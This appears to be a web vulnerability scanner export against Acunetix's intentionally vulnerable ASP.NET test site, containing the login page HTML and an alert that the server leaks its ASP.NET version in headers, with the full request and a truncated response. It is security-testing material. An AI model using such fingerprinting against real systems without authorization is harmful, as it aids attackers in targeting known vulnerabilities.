<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6543 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (6543 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 22723Response body (22723 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+IC